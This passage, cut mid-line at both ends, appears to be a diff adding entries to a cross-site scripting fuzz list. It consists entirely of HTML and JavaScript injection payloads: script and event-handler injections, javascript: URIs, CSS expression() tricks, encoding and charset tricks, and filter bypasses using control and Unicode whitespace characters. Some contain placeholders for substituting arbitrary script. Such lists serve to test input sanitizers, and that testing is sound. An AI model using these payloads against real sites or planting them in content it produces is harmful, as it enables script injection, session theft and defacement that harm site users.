href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> 
+"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input 
onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html 
onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee 
onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body 
onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> 
+<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" 